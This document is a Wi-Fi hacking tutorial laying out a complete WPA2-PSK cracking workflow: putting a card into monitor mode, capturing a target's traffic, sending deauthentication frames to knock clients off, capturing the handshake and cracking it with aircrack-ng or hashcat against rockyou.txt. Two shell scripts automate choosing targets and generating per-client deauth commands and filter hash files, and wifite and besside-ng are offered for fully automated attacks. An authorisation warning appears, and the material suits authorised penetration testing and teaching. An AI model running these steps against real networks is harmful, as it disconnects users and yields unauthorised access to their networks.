WPA2 PSK Cracking

The Hacking Process Overview

WPA2 PSK (Pre-Shared Key) cracking follows a systematic 6-step process:

  1. Place - Put wireless card into monitor mode

  2. Discover - Discover information about the network (Channel, BSSID)

  3. Select - Select network and capture data

  4. Perform - Perform deauth attack

  5. Capture - Capture WPA handshake

  6. Attempt - Attempt to crack the handshake

Step-by-Step Process

1. Place - Put Wireless Card into Monitor Mode

First, identify your wireless interface and put it into monitor mode:

# Check wireless interfaces
iwconfig

# Kill processes that might interfere
sudo airmon-ng check kill

# Put interface into monitor mode
sudo airmon-ng start wlan0

# Verify monitor mode is active
iwconfig

Your interface should now show as wlan0mon or similar (some newer airmon-ng versions keep the name wlan0 and only switch the mode; check for Mode:Monitor in the iwconfig output). Note that airmon-ng check kill stops NetworkManager and wpa_supplicant, so you lose normal Wi-Fi connectivity until you leave monitor mode (airmon-ng stop wlan0mon) and restart those services.

2. Discover - Network Information

Use airodump-ng to discover networks and gather information:

# Scan for networks
sudo airodump-ng wlan0mon

Look for:

  • BSSID (MAC address of the access point)

  • CH (channel number; you need it to lock the capture to one channel)

  • ESSID (network name)

  • ENC / CIPHER / AUTH columns: the target should read WPA2, CCMP, PSK. WPA3 (AUTH shows SAE) is not covered by this process, because SAE does not expose a passphrase-derived handshake for offline guessing.

  • Connected clients: the STATION list in the lower half of the screen, with the BSSID each station is associated with. You need at least one associated client to capture a handshake.

3. Select - Target Network and Capture Data

Focus on a specific network and start capturing:

# Capture specific network
sudo airodump-ng -c [CHANNEL] --bssid [BSSID] -w capture wlan0mon

Example:

sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

This will:

  • Lock the card to channel 6 so it does not hop away while the handshake is in flight

  • Record only frames to and from that BSSID

  • Write capture-01.cap (the packets, including any EAPOL handshake frames) and capture-01.csv (the AP and station tables) in the current directory; the number increments on each run

4. Perform - Deauth Attack

Leave airodump-ng running and, in a second terminal, send deauthentication frames so connected clients drop off and re-associate. The re-association replays the 4-way handshake, which airodump-ng then records:

# Deauth all clients from the AP
sudo aireplay-ng -0 10 -a [BSSID] wlan0mon

# Deauth specific client
sudo aireplay-ng -0 10 -a [BSSID] -c [CLIENT_MAC] wlan0mon

Example:

# Deauth all clients
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# Deauth specific client
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

Parameters:

  • -0 = Deauthentication attack (same as --deauth)

  • 10 = Number of deauth rounds to send; 0 sends them continuously until you stop it

  • -a = Access Point BSSID

  • -c = Client MAC address (optional). Without it aireplay-ng sends broadcast deauths, which many clients ignore; targeting a STATION seen in airodump-ng is far more reliable. Start with a small count so you do not keep the client offline longer than needed.
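As an added example (not part of the original page or of the aircrack-ng project), the following POSIX shell script covers steps 2 to 4 from the CSV that airodump-ng writes next to the .cap: it looks up the target's BSSID and channel by ESSID, lists the stations associated with it, and prints the capture and per-client deauth commands instead of running them. The CSV it writes is constructed to mimic airodump-ng's layout; the ESSID TestLab, the MAC addresses, the /tmp path and wlan0mon are placeholders, and the 5-round deauth count is a choice, not something the page prescribes.

```shell
#!/bin/sh
# Added example: pick the target for steps 2-4 from the CSV that
# "airodump-ng -w capture" writes (capture-01.csv) instead of reading the
# screen, and print the exact airodump-ng/aireplay-ng lines for it.
# The sample CSV is constructed to mimic airodump-ng's layout; nothing here
# touches a wireless interface.

CSV="${CSV:-/tmp/capture-01.csv}"   # placeholder path

# Constructed sample of airodump-ng's CSV: an AP section, a blank line, then a
# station section. airodump-ng writes ", "-separated fields with CRLF endings.
write_sample_csv() {  # $1 = output path
    printf '%s\r\n' \
'BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key' \
'AA:BB:CC:DD:EE:FF, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -45,      120,        0,   0.  0.  0.  0,   7, TestLab, ' \
'DE:AD:BE:EF:00:01, 2024-01-01 10:00:01, 2024-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -70,       80,        0,   0.  0.  0.  0,   5, Guest, ' \
'' \
'Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs' \
'11:22:33:44:55:66, 2024-01-01 10:00:05, 2024-01-01 10:04:59, -50,       30, AA:BB:CC:DD:EE:FF, TestLab' \
'77:88:99:AA:BB:CC, 2024-01-01 10:01:00, 2024-01-01 10:04:00, -60,       12, AA:BB:CC:DD:EE:FF, ' \
'CA:FE:00:00:00:01, 2024-01-01 10:02:00, 2024-01-01 10:03:00, -80,        3, (not associated), Guest' \
        > "$1"
}

# Read one field of the AP row whose ESSID matches (fields numbered as in the
# header line: 1 = BSSID, 4 = channel, 6 = Privacy, 14 = ESSID).
ap_field() {  # $1 = csv, $2 = ESSID, $3 = field number
    tr -d '\r' < "$1" | awk -F', *' -v essid="$2" -v f="$3" \
        'NF >= 14 && $14 == essid { print $f; exit }'
}
ap_bssid()   { ap_field "$1" "$2" 1; }
ap_channel() { ap_field "$1" "$2" 4; }
ap_privacy() { ap_field "$1" "$2" 6; }

# Station MACs currently associated with a BSSID, one per line. Station rows
# carry the AP's BSSID in field 6 ("(not associated)" for probing-only clients).
clients_of() {  # $1 = csv, $2 = BSSID
    tr -d '\r' < "$1" | awk -F', *' -v bssid="$2" '$6 == bssid { print $1 }'
}

# Print the step 3 capture command and one targeted step 4 deauth per client.
# Returns 1 if the ESSID is missing or not WPA, 2 if no client is associated
# (a deauth is pointless then; wait for a station to show up).
plan_attack() {  # $1 = csv, $2 = ESSID, $3 = monitor interface
    bssid=$(ap_bssid "$1" "$2")
    [ -n "$bssid" ] || { echo "ESSID '$2' not found in $1" >&2; return 1; }
    case "$(ap_privacy "$1" "$2")" in
        *WPA*) ;;
        *) echo "'$2' is not WPA/WPA2; this procedure does not apply" >&2; return 1 ;;
    esac
    chan=$(ap_channel "$1" "$2")
    echo "sudo airodump-ng -c $chan --bssid $bssid -w capture $3"
    clients=$(clients_of "$1" "$bssid")
    if [ -z "$clients" ]; then
        echo "no station associated with $bssid yet; wait before deauthing" >&2
        return 2
    fi
    for sta in $clients; do
        # 5 rounds per client is an arbitrary starting point, not a page value
        echo "sudo aireplay-ng -0 5 -a $bssid -c $sta $3"
    done
}

write_sample_csv "$CSV"
plan_attack "$CSV" TestLab wlan0mon
```

Point CSV at your own capture-01.csv (and drop the write_sample_csv call) to plan against a real scan; the commands are printed rather than executed so you can review the target before sending anything.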

5. Capture - WPA Handshake

Watch the top-right corner of the airodump-ng window for the handshake indicator:

WPA handshake: AA:BB:CC:DD:EE:FF

When you see this message, airodump-ng has recorded EAPOL frames for that BSSID. The indicator can appear for a partial exchange that is not usable for cracking, so confirm before investing time in a wordlist run: running aircrack-ng on capture-01.cap without a wordlist lists each network together with the number of usable handshakes it found. If that count is 0, repeat the deauth and keep capturing.

6. Attempt - Crack the Handshake

Use aircrack-ng or hashcat to crack the captured handshake. Both try each candidate passphrase from the wordlist, derive the PMK and PTK for the ESSID, and compare the resulting MIC with the one in the capture, so the run succeeds only if the real passphrase is in the list.

Using aircrack-ng:

# Crack with wordlist (root is not required; the capture file only has to be readable)
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

# Crack a specific network when the capture contains several
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b [BSSID] capture-01.cap

Using hashcat (much faster, especially on a GPU):

# Recommended: convert to the 22000 format with hcxpcapngtool (hcxtools) and use mode 22000,
# which handles both 4-way handshakes and PMKIDs from the same file
hcxpcapngtool -o capture.22000 capture-01.cap
hashcat -m 22000 capture.22000 /usr/share/wordlists/rockyou.txt

# Legacy route for older hashcat versions: .hccapx with mode 2500
# (deprecated since hashcat 6.0, where 22000 replaced it)
cap2hccapx capture-01.cap capture.hccapx
hashcat -m 2500 capture.hccapx /usr/share/wordlists/rockyou.txt
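Before handing a 22000 file to hashcat it is worth checking what it contains: hcxpcapngtool converts every handshake and PMKID in the capture, not only the target's, and a long run against a network outside your authorisation is both wasted time and a scope violation. The script below, an added example that is not part of this page or of hashcat/hcxtools, parses the 22000 line format, prints one summary line per hash and filters the file down to a single BSSID. The three sample lines are constructed with dummy MIC, nonce and EAPOL fields; the MACs and /tmp paths are placeholders, and the BSSID normalisation assumes colon-separated input.

```shell
#!/bin/sh
# Added example: triage a hashcat 22000 file before starting a long run.
# hcxpcapngtool writes one line per recovered handshake or PMKID in the form
#   WPA*TYPE*MIC_or_PMKID*MAC_AP*MAC_CLIENT*ESSID_HEX*ANONCE*EAPOL*MESSAGEPAIR
# TYPE 01 = PMKID, 02 = EAPOL 4-way handshake; MACs are 12 hex digits without
# colons; the ESSID is hex-encoded. A capture usually holds other networks
# too, so this keeps only the lines for the authorised target BSSID.
# The sample lines are constructed; their key material is dummy data.

HASHES="${HASHES:-/tmp/capture.22000}"   # placeholder path

write_sample_22000() {  # $1 = output path
    nonce=0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
    eapol=0103007502010a000000000000000000010000000000000000000000000000000000
    printf '%s\n' \
"WPA*02*00112233445566778899aabbccddeeff*aabbccddeeff*112233445566*546573744c6162*$nonce*$eapol*02" \
"WPA*01*ffeeddccbbaa99887766554433221100*deadbeef0001*778899aabbcc*4775657374***" \
"WPA*02*0f1e2d3c4b5a69788796a5b4c3d2e1f0*deadbeef0001*cafe00000001*4775657374*$nonce*$eapol*00" \
        > "$1"
}

# BSSID as the 22000 format spells it: 12 lowercase hex digits, no colons
mac_norm() { printf '%s' "$1" | tr -d ':' | tr 'A-F' 'a-f'; }

# Decode the hex ESSID field with portable awk (no xxd or strtonum needed)
hex_to_ascii() {
    printf '%s' "$1" | awk '
        function hv(c) { return index("0123456789abcdef", tolower(c)) - 1 }
        { for (i = 1; i + 1 <= length($0); i += 2)
              printf "%c", hv(substr($0, i, 1)) * 16 + hv(substr($0, i + 1, 1)) }'
}

# One summary line per hash: kind, AP MAC, client MAC, decoded ESSID
summarize_22000() {  # $1 = hash file
    while IFS='*' read -r proto type keymat ap client essid rest; do
        [ "$proto" = "WPA" ] || continue
        case "$type" in
            01) kind=PMKID ;;
            02) kind=EAPOL ;;
            *)  kind="unknown($type)" ;;
        esac
        echo "$kind $ap $client $(hex_to_ascii "$essid")"
    done < "$1"
}

# Keep only the target's hashes in a new file; prints how many lines were kept
filter_22000() {  # $1 = hash file, $2 = target BSSID, $3 = output file
    mac=$(mac_norm "$2")
    awk -F'[*]' -v mac="$mac" '$1 == "WPA" && tolower($4) == mac' "$1" > "$3"
    wc -l < "$3" | tr -d ' '
}

write_sample_22000 "$HASHES"
summarize_22000 "$HASHES"
kept=$(filter_22000 "$HASHES" AA:BB:CC:DD:EE:FF /tmp/target.22000)
echo "$kept hash(es) for the target; run: hashcat -m 22000 /tmp/target.22000 /usr/share/wordlists/rockyou.txt"
```

Run it against the real output of hcxpcapngtool by setting HASHES and dropping the write_sample_22000 call; a filtered file with zero lines means the target's handshake did not survive conversion and the capture step needs repeating.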

Important Notes

Prerequisites

  • Wireless adapter whose driver supports monitor mode and packet injection on the target's band

  • Target network must have at least one connected client; the 4-way handshake only occurs when a client authenticates

  • Legal authorization to test the network

Tips for Success

  1. Patience: if deauth does not produce a handshake, leave airodump-ng running; a client that connects or roams on its own gives you the handshake without any injection

  2. Targeted deauth: deauth one associated STATION with -c rather than broadcasting, send a small number of rounds, and check first that your card actually injects (aireplay-ng -9 wlan0mon runs the injection test)

  3. Good wordlists: the attack only recovers passphrases that are in the list, so use comprehensive wordlists like rockyou.txt, hashcat rules, or lists built from the target (SSID-derived words, local phone-number patterns)

  4. Hardware: use an adapter with a driver known to support monitor mode and injection (e.g., Alfa AWUS036ACS)

Common Issues

  • No handshake captured: the client may be ignoring broadcast deauths, the card may not be injecting, or the AP and client may use 802.11w Protected Management Frames, which authenticate deauth frames and defeat the attack; in that case you can only wait for a natural reconnect

  • Weak signal: get closer to the target network; a low PWR value means your deauth frames may not reach the client even if you can hear the AP

  • No clients: some networks may not have active clients, and without one there is no handshake to capture

⚠️ WARNING: Only perform these attacks on networks you own or have explicit written permission to test. Unauthorized access to wireless networks is illegal in most jurisdictions.

Alternative Tools

Wifite

Automates the whole sequence (monitor mode, scanning, deauth, handshake capture and cracking against the given dictionary):

sudo wifite --wpa --dict /usr/share/wordlists/rockyou.txt

Besside-ng

Another automated approach: besside-ng deauths and collects WPA handshakes for the given BSSID on its own, saving them to wpa.cap for later cracking:

sudo besside-ng -c [CHANNEL] -b [BSSID] wlan0mon

Summary

  • WPA2 PSK cracking requires capturing the 4-way handshake

  • Deauth attacks force clients to reconnect and expose the handshake

  • Success depends on password strength and wordlist quality

  • Always ensure you have proper authorization before testing
